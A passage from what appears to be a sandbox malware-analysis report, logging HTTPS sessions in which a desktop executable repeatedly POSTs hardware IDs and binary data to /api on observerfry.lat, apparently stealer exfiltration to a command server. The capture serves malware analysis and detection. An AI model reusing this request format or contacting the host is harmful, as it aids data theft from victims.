cfL4;desc="?proto=TCP&rtt=1539&min_rtt=1527&rtt_var=596&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=952&delivery_rate=1799137&cwnd=177&unsent_bytes=0&cid=f01905318d79abf3&ts=785&x=0"
2024-12-24 10:22:17 UTC	242	IN	Data Raw: 34 39 31 63 0d 0a 32 6b 53 59 44 52 46 61 45 7a 30 49 49 37 33 76 59 71 50 79 70 51 45 56 6b 30 2f 76 6e 32 75 56 66 57 5a 4a 48 73 70 35 43 51 71 68 5a 75 34 76 4b 32 34 2f 48 33 74 47 6e 39 55 57 30 59 66 41 4c 54 66 79 4b 38 32 6c 44 66 51 52 46 53 77 79 36 41 39 6b 4b 4f 41 69 2b 57 46 69 50 7a 38 66 62 56 75 66 31 54 6e 59 30 4d 42 76 4e 36 6c 74 69 76 55 4a 39 42 45 45 4b 48 57 6c 43 57 56 70 73 69 6a 2f 5a 58 51 35 64 31 78 6b 54 74 69 4b 42 38 4b 59 79 32 68 34 2b 79 4c 4e 73 30 6e 77 42 30 52 7a 50 49 63 63 66 57 75 58 4a 65 74 6d 4d 79 63 2f 52 69 70 47 30 38 31 59 67 5a 50 41 59 33 6e 31 4b 34 54 33 41 2f 30 5a 42 53 31 30 75 68 42 76 59 72 49 6d 2f 47 52 2b 4d 47 4e 52 62 6b 6e 54 6a 41 33 43 30 49 6b 6a Data Ascii: 491c2kSYDRFaEz0II73vYqPypQEVk0/vn2uVfWZJHsp5CQqhZu4vK24/H3tGn9UW0YfALTfyK82lDfQRFSwy6A9kKOAi+WFiPz8fbVuf1TnY0MBvN6ltivUJ9BEEKHWlCWVpsij/ZXQ5d1xkTtiKB8KYy2h4+yLNs0nwB0RzPIccfWuXJetmMyc/RipG081YgZPAY3n1K4T3A/0ZBS10uhBvYrIm/GR+MGNRbknTjA3C0Ikj
2024-12-24 10:22:17 UTC	1369	IN	Data Raw: 63 4f 6c 74 31 62 31 61 78 52 77 56 4f 6d 6d 6c 43 32 30 6f 70 32 6a 6a 4c 33 51 30 4d 51 63 71 53 64 4f 44 42 63 4b 66 77 47 4a 33 34 79 4b 4e 2f 67 48 2f 47 77 34 6b 63 36 63 56 59 57 2b 77 4c 2f 31 67 64 44 42 33 55 47 6b 42 6b 63 30 48 32 64 43 66 49 31 66 68 4c 6f 37 70 42 4f 5a 66 47 32 56 6c 36 42 78 6e 4b 4f 42 6d 2f 47 46 79 4e 58 46 4e 59 6b 72 55 69 42 4c 4b 6d 63 70 75 64 2f 77 6e 67 76 34 4a 38 42 55 4f 4a 48 61 73 46 6d 5a 75 75 43 61 36 49 54 4d 2f 61 52 38 79 41 66 79 49 45 4d 61 63 30 53 46 4e 73 54 4c 44 35 45 6e 77 45 30 52 7a 50 4b 41 65 61 47 75 7a 4b 66 6c 6e 65 43 70 78 54 57 78 4d 32 70 38 47 78 4a 37 4e 59 47 58 37 49 34 76 2b 41 50 77 57 41 53 78 34 36 46 55 72 62 36 42 6d 6f 69 39 53 4e 58 70 54 59 46 62 66 7a 52 2b 50 69 59 64 Data Ascii: cOlt1b1axRwVOmmlC20op2jjL3Q0MQcqSdODBcKfwGJ34yKN/gH/Gw4kc6cVYW+wL/1gdDB3UGkBkc0H2dCfI1fhLo7pBOZfG2Vl6BxnKOBm/GFyNXFNYkrUiBLKmcpud/wngv4J8BUOJHasFmZuuCa6ITM/aR8yAfyIEMac0SFNsTLD5EnwE0RzPKAeaGuzKflneCpxTWxM2p8GxJ7NYGX7I4v+APwWASx46FUrb6Bmoi9SNXpTYFbfzR+PiYd
2024-12-24 10:22:17 UTC	1369	IN	Data Raw: 34 76 79 42 50 74 66 53 6d 74 37 73 46 73 7a 4b 4a 49 6c 37 6d 78 35 65 6b 52 63 5a 45 2f 59 6d 30 44 65 33 74 34 6a 63 50 31 74 31 62 30 45 39 68 63 43 4f 58 4f 6c 47 47 56 6d 74 79 50 31 5a 33 4d 34 66 46 70 75 53 74 53 4f 44 63 57 43 7a 57 4e 2f 39 43 79 48 39 30 6d 35 58 77 4d 7a 50 50 42 62 57 6e 2b 7a 5a 4d 39 73 66 54 5a 32 53 53 70 65 6b 5a 52 41 78 70 79 48 4f 7a 66 38 4a 59 6a 34 42 76 59 56 43 69 35 32 70 42 4e 6c 61 36 6f 70 2f 6d 39 2f 4d 48 74 53 5a 45 58 58 68 41 76 4b 6c 73 64 69 66 62 46 6a 7a 66 6f 52 74 30 64 45 48 33 75 6b 46 6d 51 71 6a 53 58 30 59 58 51 75 4d 55 41 6b 57 4a 2b 4b 44 49 48 49 68 32 39 2b 38 53 61 48 2b 51 6e 77 45 67 45 6f 65 36 73 57 62 47 4b 32 49 66 35 6a 65 6a 56 33 58 32 31 46 32 70 38 46 79 4a 7a 4c 49 7a 6d 78 Data Ascii: 4vyBPtfSmt7sFszKJIl7mx5ekRcZE/Ym0De3t4jcP1t1b0E9hcCOXOlGGVmtyP1Z3M4fFpuStSODcWCzWN/9CyH90m5XwMzPPBbWn+zZM9sfTZ2SSpekZRAxpyHOzf8JYj4BvYVCi52pBNla6op/m9/MHtSZEXXhAvKlsdifbFjzfoRt0dEH3ukFmQqjSX0YXQuMUAkWJ+KDIHIh29+8SaH+QnwEgEoe6sWbGK2If5jejV3X21F2p8FyJzLIzmx
2024-12-24 10:22:17 UTC	1369	IN	Data Raw: 66 75 58 77 4d 6e 50 50 42 62 59 6d 47 71 4b 50 52 6d 66 6a 35 35 57 47 52 4d 31 49 73 4c 78 70 66 42 62 6e 2f 38 4b 49 37 38 44 66 30 4e 42 79 42 32 70 52 45 72 4a 76 67 68 34 69 38 72 65 46 5a 54 51 31 48 45 6e 78 61 42 6a 34 6c 36 4e 2f 59 68 7a 61 56 4a 39 42 41 4e 4a 48 53 67 46 47 52 73 74 69 44 38 59 6e 59 33 65 30 31 69 54 39 4b 47 44 38 71 43 78 32 35 7a 2f 53 6d 46 39 67 4f 33 55 55 51 73 5a 4f 68 44 4b 31 32 31 4b 66 70 73 5a 58 68 75 45 58 4d 42 32 49 46 41 6d 64 44 4c 62 58 66 2b 49 59 48 32 41 66 59 54 43 69 78 35 6f 52 4e 6a 65 72 6b 69 38 6d 35 39 4e 33 42 62 62 30 54 62 69 67 54 48 6e 34 63 74 4e 2f 59 31 7a 61 56 4a 32 44 67 78 61 56 32 53 57 33 51 6d 6f 57 62 39 59 7a 4e 67 4d 56 4e 70 54 64 65 43 42 73 69 63 7a 57 70 38 2f 53 61 4a 38 Data Ascii: fuXwMnPPBbYmGqKPRmfj55WGRM1IsLxpfBbn/8KI78Df0NByB2pRErJvgh4i8reFZTQ1HEnxaBj4l6N/YhzaVJ9BANJHSgFGRstiD8YnY3e01iT9KGD8qCx25z/SmF9gO3UUQsZOhDK121KfpsZXhuEXMB2IFAmdDLbXf+IYH2AfYTCix5oRNjerki8m59N3Bbb0TbigTHn4ctN/Y1zaVJ2DgxaV2SW3QmoWb9YzNgMVNpTdeCBsiczWp8/SaJ8
2024-12-24 10:22:17 UTC	1369	IN	Data Raw: 4c 4b 6e 32 75 43 57 78 68 71 69 6a 33 59 48 73 77 65 46 35 75 52 4e 4b 4c 44 4d 75 52 77 47 31 35 2b 57 33 44 76 51 37 76 58 31 78 72 58 62 67 41 65 58 36 31 42 2f 64 67 4d 79 63 2f 52 69 70 47 30 38 31 59 67 5a 6e 56 5a 33 72 6a 4a 49 72 7a 42 76 51 4e 42 53 5a 33 75 68 78 6b 62 4c 38 71 2f 47 42 31 4f 58 52 56 5a 6b 62 61 68 67 2f 4e 30 49 6b 6a 63 4f 6c 74 31 62 30 6e 2f 41 77 54 4b 48 4b 6a 44 58 41 6f 70 32 6a 6a 4c 33 51 30 4d 51 63 71 51 74 53 47 42 4d 47 63 78 32 64 36 38 54 2b 43 2b 67 37 2b 46 42 59 68 65 36 38 51 59 32 4f 33 49 4f 68 6a 66 53 70 30 54 58 67 42 6b 63 30 48 32 64 43 66 49 30 48 32 50 5a 33 2b 53 38 59 4a 42 7a 31 33 70 52 63 72 64 2f 59 2f 75 6d 68 2f 65 43 6b 66 62 45 37 57 6a 67 2f 41 6d 63 74 75 63 76 67 6f 6a 50 73 4e 2f 52 Data Ascii: LKn2uCWxhqij3YHsweF5uRNKLDMuRwG15+W3DvQ7vX1xrXbgAeX61B/dgMyc/RipG081YgZnVZ3rjJIrzBvQNBSZ3uhxkbL8q/GB1OXRVZkbahg/N0IkjcOlt1b0n/AwTKHKjDXAop2jjL3Q0MQcqQtSGBMGcx2d68T+C+g7+FBYhe68QY2O3IOhjfSp0TXgBkc0H2dCfI0H2PZ3+S8YJBz13pRcrd/Y/umh/eCkfbE7Wjg/AmctucvgojPsN/R
2024-12-24 10:22:17 UTC	1369	IN	Data Raw: 36 41 51 6c 63 66 67 68 39 69 38 72 65 48 4a 59 61 55 44 56 68 41 7a 4f 6c 38 4e 78 66 66 59 2f 6a 50 77 43 2b 68 4d 45 4a 6e 47 69 47 6d 4a 6c 74 43 76 39 61 48 77 39 4d 52 45 71 52 73 66 4e 57 49 47 78 79 6d 68 37 71 6e 66 4e 34 6b 66 75 58 77 4d 6e 50 50 42 62 61 32 4b 39 4c 50 64 73 66 44 74 6a 58 6d 78 54 33 34 41 4b 30 35 72 4d 5a 6e 72 38 49 49 37 37 44 2f 77 54 46 69 4a 38 71 78 41 72 4a 76 67 68 34 69 38 72 65 46 4a 49 66 45 76 59 67 52 62 4b 6b 63 52 31 65 75 46 74 77 37 30 59 38 41 35 45 63 32 71 34 44 47 78 33 39 6a 2b 36 61 48 39 34 4b 52 39 73 53 4e 6d 4b 42 73 2b 43 77 6d 56 34 2f 69 53 45 2b 51 48 30 48 77 41 76 65 36 30 59 5a 32 4f 2f 4a 66 56 72 65 6a 5a 34 55 43 6f 50 6e 34 6f 59 67 63 69 48 51 6d 7a 79 49 59 43 39 46 72 6b 47 52 43 78 Data Ascii: 6AQlcfgh9i8reHJYaUDVhAzOl8NxffY/jPwC+hMEJnGiGmJltCv9aHw9MREqRsfNWIGxymh7qnfN4kfuXwMnPPBba2K9LPdsfDtjXmxT34AK05rMZnr8II77D/wTFiJ8qxArJvgh4i8reFJIfEvYgRbKkcR1euFtw70Y8A5Ec2q4DGx39j+6aH94KR9sSNmKBs+CwmV4/iSE+QH0HwAve60YZ2O/JfVrejZ4UCoPn4oYgciHQmzyIYC9FrkGRCx
2024-12-24 10:22:17 UTC	1369	IN	Data Raw: 79 6a 67 5a 74 70 6b 5a 54 31 32 53 53 68 30 33 49 4d 4f 78 6f 61 48 66 45 69 2f 62 59 4c 6e 53 61 38 6d 48 57 74 37 70 46 73 7a 4b 4b 30 68 2b 6d 68 70 4c 6e 5a 54 65 30 72 53 67 53 4c 4f 6c 39 46 67 65 50 49 38 68 4c 45 43 2b 6c 39 4b 61 33 75 77 57 7a 4d 6f 6c 79 48 73 62 46 77 37 59 46 59 71 44 35 2b 4b 46 6f 48 49 68 31 30 33 34 79 36 64 2f 67 62 6d 49 55 52 7a 5a 5a 5a 62 59 48 36 2f 4e 76 6c 35 65 44 56 39 54 6c 51 42 68 39 6c 53 6b 38 4b 56 4d 57 69 78 4d 72 4b 7a 53 66 5a 66 58 42 4a 6c 36 41 30 72 4d 4f 70 6f 75 6e 30 7a 59 44 45 59 61 56 50 4e 69 77 50 58 6b 34 42 64 53 64 59 37 68 2f 6f 5a 38 41 67 4c 61 7a 4c 6f 46 43 73 77 67 57 62 7a 61 47 67 70 5a 31 4a 36 52 70 2b 79 54 6f 47 49 68 7a 73 33 78 43 36 44 38 77 37 68 44 6b 6b 4d 61 71 49 63 Data Ascii: yjgZtpkZT12SSh03IMOxoaHfEi/bYLnSa8mHWt7pFszKK0h+mhpLnZTe0rSgSLOl9FgePI8hLEC+l9Ka3uwWzMolyHsbFw7YFYqD5+KFoHIh1034y6d/gbmIURzZZZbYH6/Nvl5eDV9TlQBh9lSk8KVMWixMrKzSfZfXBJl6A0rMOpoun0zYDEYaVPNiwPXk4BdSdY7h/oZ8AgLazLoFCswgWbzaGgpZ1J6Rp+yToGIhzs3xC6D8w7hDkkMaqIc
2024-12-24 10:22:17 UTC	1369	IN	Data Raw: 66 33 59 44 38 32 65 6c 39 74 55 63 6d 57 54 4d 6d 54 33 58 6c 4a 7a 77 61 42 2b 77 37 74 47 41 49 4e 58 4f 68 56 4b 32 66 34 66 73 4d 76 4f 33 68 4f 45 53 70 5a 6e 39 56 41 39 4a 50 4a 62 58 44 6e 50 4d 44 56 4b 73 30 6c 52 67 64 37 76 56 6c 66 62 36 67 33 38 57 4a 2f 65 44 38 66 62 41 47 48 33 55 36 42 6c 4e 59 6a 4c 36 46 2f 31 71 68 61 6f 45 39 57 4e 44 4b 78 57 33 30 6f 34 48 53 30 4c 32 46 34 4b 52 38 74 51 73 32 66 42 73 4b 47 78 43 52 4a 7a 77 71 44 2b 67 6a 68 44 78 4d 6b 51 70 59 4f 61 47 61 32 49 65 78 2b 4d 33 59 78 55 43 6f 5a 35 73 31 49 67 61 2b 4a 49 32 2b 78 64 63 33 49 43 76 6b 52 41 7a 31 74 35 54 78 6c 62 37 6b 77 36 6e 68 38 65 44 38 66 62 41 47 48 33 30 36 42 6c 4e 59 6a 4c 36 46 2f 31 71 68 61 6f 45 39 57 4e 44 4b 78 57 33 30 6f 34 Data Ascii: f3YD82el9tUcmWTMmT3XlJzwaB+w7tGAINXOhVK2f4fsMvO3hOESpZn9VA9JPJbXDnPMDVKs0lRgd7vVlfb6g38WJ/eD8fbAGH3U6BlNYjL6F/1qhaoE9WNDKxW30o4HS0L2F4KR8tQs2fBsKGxCRJzwqD+gjhDxMkQpYOaGa2Iex+M3YxUCoZ5s1Iga+JI2+xdc3ICvkRAz1t5Txlb7kw6nh8eD8fbAGH306BlNYjL6F/1qhaoE9WNDKxW30o4
2024-12-24 10:22:17 UTC	1369	IN	Data Raw: 38 50 7a 4e 2f 62 56 66 63 7a 55 36 42 6e 49 63 37 4e 2f 41 6e 6e 66 41 47 38 46 4d 44 4d 58 76 6f 56 53 74 6d 2b 48 36 36 62 6e 6b 6f 66 46 42 74 44 64 6d 44 44 6f 47 50 69 58 6f 33 35 32 33 56 72 6b 65 33 44 55 52 7a 50 4f 38 59 65 58 71 2b 4a 65 78 73 4e 41 5a 50 63 6e 68 47 7a 34 35 43 38 4a 33 44 64 57 4c 79 50 59 72 44 4e 39 6f 4e 41 7a 74 2f 36 69 70 39 61 37 67 6f 2f 53 38 39 65 47 6b 66 4d 67 48 79 6e 77 66 52 6b 34 63 74 4e 2f 31 74 31 62 30 45 35 52 67 55 4b 44 43 76 41 57 77 6f 70 32 6a 6a 4c 32 56 34 4b 51 77 6b 41 63 33 4e 57 49 48 58 79 57 35 32 38 69 4f 4f 37 78 76 78 48 42 49 6f 4f 35 59 6c 52 6e 71 2f 4e 76 6b 74 51 6a 56 31 53 58 39 43 7a 34 6f 2b 2f 37 33 56 5a 47 66 79 62 36 48 36 42 50 73 68 4f 68 78 74 72 77 73 70 54 72 73 77 2b 53 Data Ascii: 8PzN/bVfczU6BnIc7N/AnnfAG8FMDMXvoVStm+H66bnkofFBtDdmDDoGPiXo3523Vrke3DURzPO8YeXq+JexsNAZPcnhGz45C8J3DdWLyPYrDN9oNAzt/6ip9a7go/S89eGkfMgHynwfRk4ctN/1t1b0E5RgUKDCvAWwop2jjL2V4KQwkAc3NWIHXyW528iOO7xvxHBIoO5YlRnq/NvktQjV1SX9Cz4o+/73VZGfyb6H6BPshOhxtrwspTrsw+S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	104.21.36.201	443	5576	C:\Users\user\Desktop\SFtDA07UDr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:22:19 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=24K1ZWSU412Z User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18133 Host: observerfry.lat
2024-12-24 10:22:19 UTC	15331	OUT	Data Raw: 2d 2d 32 34 4b 31 5a 57 53 55 34 31 32 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 30 41 42 35 34 33 30 37 36 41 42 36 41 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 32 34 4b 31 5a 57 53 55 34 31 32 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 34 4b 31 5a 57 53 55 34 31 32 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 32 34 4b 31 5a 57 53 55 Data Ascii: --24K1ZWSU412ZContent-Disposition: form-data; name="hwid"970AB543076AB6A1BEBA0C6A975F1733--24K1ZWSU412ZContent-Disposition: form-data; name="pid"2--24K1ZWSU412ZContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--24K1ZWSU
2024-12-24 10:22:19 UTC	2802	OUT	Data Raw: cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d Data Ascii: u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
2024-12-24 10:22:20 UTC	1138	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:22:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7hcbbs51eopm4j0u3bg4012a31; expires=Sat, 19 Apr 2025 04:08:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ubUdsHHnGfJKWmgJiHauqB7eheEi%2Bh%2FAhHJbL27AhmikUJSuWSHuz%2FM0PsLQ6lv0kEG%2Fy5hqBcYR52EHzdG1ihIb%2FW0U549LAsF%2BO3BugKgW%2BnK%2FVZzcH14yxoxqrbN6PyE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6fde9e6eaa72b6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1963&min_rtt=1947&rtt_var=763&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2837&recv_bytes=19088&delivery_rate=1404521&cwnd=239&unsent_bytes=0&cid=56376f88ceb34693&ts=1133&x=0"
2024-12-24 10:22:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 10:22:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	104.21.36.201	443	5576	C:\Users\user\Desktop\SFtDA07UDr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:22:22 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=UPCS30ZQFT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8742 Host: observerfry.lat
2024-12-24 10:22:22 UTC	8742	OUT	Data Raw: 2d 2d 55 50 43 53 33 30 5a 51 46 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 30 41 42 35 34 33 30 37 36 41 42 36 41 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 55 50 43 53 33 30 5a 51 46 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 50 43 53 33 30 5a 51 46 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 55 50 43 53 33 30 5a 51 46 54 0d 0a 43 6f Data Ascii: --UPCS30ZQFTContent-Disposition: form-data; name="hwid"970AB543076AB6A1BEBA0C6A975F1733--UPCS30ZQFTContent-Disposition: form-data; name="pid"2--UPCS30ZQFTContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--UPCS30ZQFTCo
2024-12-24 10:22:23 UTC	1126	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:22:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jrodkkedlkiir1g0evhagh0ou3; expires=Sat, 19 Apr 2025 04:09:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GHpo2nEMBhj58zdl%2FffK2o2Qqj8RFA5Wgr1GpLMSa9xJRgcwHg%2FCgo3n4A8AWi2eDSJubvK8FkZcvIPElqPAutA5M6fbw%2F4GFpHxy9tHziNsYnX0q5yQBxpf%2F31QLsAcgNM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6fdeaddd20c45e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1610&rtt_var=805&sent=8&recv=16&lost=0&retrans=1&sent_bytes=4210&recv_bytes=9672&delivery_rate=304166&cwnd=243&unsent_bytes=0&cid=55f5153fbc59ec9d&ts=950&x=0"
2024-12-24 10:22:23 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 10:22:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	104.21.36.201	443	5576	C:\Users\user\Desktop\SFtDA07UDr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:22:24 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HRAMBHOZQ6QU9XA6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20431 Host: observerfry.lat
2024-12-24 10:22:24 UTC	15331	OUT	Data Raw: 2d 2d 48 52 41 4d 42 48 4f 5a 51 36 51 55 39 58 41 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 30 41 42 35 34 33 30 37 36 41 42 36 41 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 48 52 41 4d 42 48 4f 5a 51 36 51 55 39 58 41 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 52 41 4d 42 48 4f 5a 51 36 51 55 39 58 41 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 Data Ascii: --HRAMBHOZQ6QU9XA6Content-Disposition: form-data; name="hwid"970AB543076AB6A1BEBA0C6A975F1733--HRAMBHOZQ6QU9XA6Content-Disposition: form-data; name="pid"3--HRAMBHOZQ6QU9XA6Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic
2024-12-24 10:22:24 UTC	5100	OUT	Data Raw: 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-12-24 10:22:25 UTC	1130	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:22:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=15gtm3ge2matkjlq9b5ro7gjgv; expires=Sat, 19 Apr 2025 04:09:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RxmIabYT7zaGKUUF0wy4bMAaz7zDnyMAFK6pDf993VSplMlyd%2BfZ50%2FsUmaKw%2Fwc5ywtySegM4wehtD3rg2rqoFLyb5dTyJWMX%2BqmoZhKLKLoEAoxPHB7QuvwDypfZnCfUQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6fdebcdadf0f53-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1651&rtt_var=651&sent=18&recv=26&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21390&delivery_rate=1642294&cwnd=193&unsent_bytes=0&cid=51b6bd5d4435441f&ts=1006&x=0"
2024-12-24 10:22:25 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
